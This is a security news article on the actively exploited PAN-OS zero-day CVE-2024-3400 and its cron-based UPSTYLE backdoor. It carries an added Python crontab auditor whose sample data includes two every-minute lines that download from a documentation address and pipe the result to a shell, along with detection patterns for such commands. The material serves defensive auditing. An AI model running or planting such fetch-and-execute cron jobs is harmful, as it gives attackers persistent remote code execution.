Palo Alto Networks Zero-Day Flaw Exploited in Targeted Attacks
Palo Alto Networks has detected targeted attacks exploiting a recently discovered critical zero-day vulnerability in its PAN-OS software, tracked as CVE-2024-3400 with a CVSS score of 10.0.
The flaw enables unauthorized actors to execute arbitrary code with root privileges on affected firewalls. The attacks, tracked as Operation MidnightEclipse, have been closely monitored since the vulnerability was discovered.
The vulnerability affects firewalls running PAN-OS 10.2, 11.0 and 11.1 and configured with specific features enabled.
In an advisory published last Friday, Palo Alto Networks confirmed targeted attacks leveraging this flaw, attributing known exploitation to a single threat actor while acknowledging the potential for future exploitation by additional actors.
Operation MidnightEclipse encompasses post-exploitation activities, including the deployment of a Python-based backdoor named UPSTYLE via a cron job that runs every minute and executes commands remotely.
In its advisory, Palo Alto Networks shared detailed insights into the backdoor’s behavior, including its persistence mechanisms, command execution and cleanup processes.
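An added example, not taken from the article or from Palo Alto Networks' advisory: a small Python audit of exported crontab text that flags the persistence pattern described above, a job scheduled every minute, and rates it higher when the command fetches content over the network and pipes it to an interpreter. The sample crontab, the 192.0.2.10 documentation address and the name `audit_crontab` are constructed for illustration.

```python
import re

# Schedules that fire every minute: "* * * * *" or "*/1 * * * *".
EVERY_MINUTE = re.compile(r"^(\*|\*/1)\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
# The command downloads content over the network ...
FETCH = re.compile(r"\b(?:wget|curl)\b")
# ... and pipes it straight into a shell or Python interpreter.
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:(?:ba|da|z)?sh|python[\d.]*)\b")


def audit_crontab(text):
    """Return (line_number, severity, line) for every-minute cron entries.

    severity is "high" when the command fetches remote content and pipes it
    to an interpreter, otherwise "review" (frequent, but possibly legitimate).
    Works for user crontabs and for /etc/crontab-style lines with a user field.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comments
        match = EVERY_MINUTE.match(line)
        if not match:
            continue  # env assignments and less frequent schedules
        command = match.group(2)
        remote_exec = FETCH.search(command) and PIPE_TO_INTERPRETER.search(command)
        findings.append((lineno, "high" if remote_exec else "review", line))
    return findings


# Constructed sample crontab, not copied from any real device or advisory.
SAMPLE = """\
# constructed sample for illustration
MAILTO=""
0 3 * * * root /usr/local/bin/rotate-logs
* * * * * root wget -qO- http://192.0.2.10/update | bash
*/1 * * * * root /usr/local/bin/health-check
*/5 * * * * root curl -s http://192.0.2.10/status | sh
"""

if __name__ == "__main__":
    for lineno, severity, line in audit_crontab(SAMPLE):
        print(f"line {lineno} [{severity}]: {line}")
```

Entries rated "review" are not necessarily malicious; compare them against a known-good baseline of the device's scheduled jobs.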
“Anytime a vulnerability impacts devices directly connected to the Internet, it’s a cause for concern. The fact that these are being actively exploited makes this additionally troublesome,” warned Erich Kron, security awareness advocate at KnowBe4.
“Organizations with vulnerable versions of the operating system should take immediate actions to mitigate the threat by disabling features related to the vulnerability […] while keeping a vigilant watch for potential malicious network traffic or code execution on the devices.”
To address the issue, Palo Alto Networks advised users to apply hotfixes released on Sunday for affected PAN-OS versions and enable specific threat prevention measures. The company is also offering its Unit 42 Managed Threat Hunting XQL queries to help identify signs of exploitation within network logs.
Gratitude is extended to Volexity for discovering the vulnerability, highlighting the significance of collaboration in combating cybersecurity threats.
Image credit: Tada Images / Shutterstock.com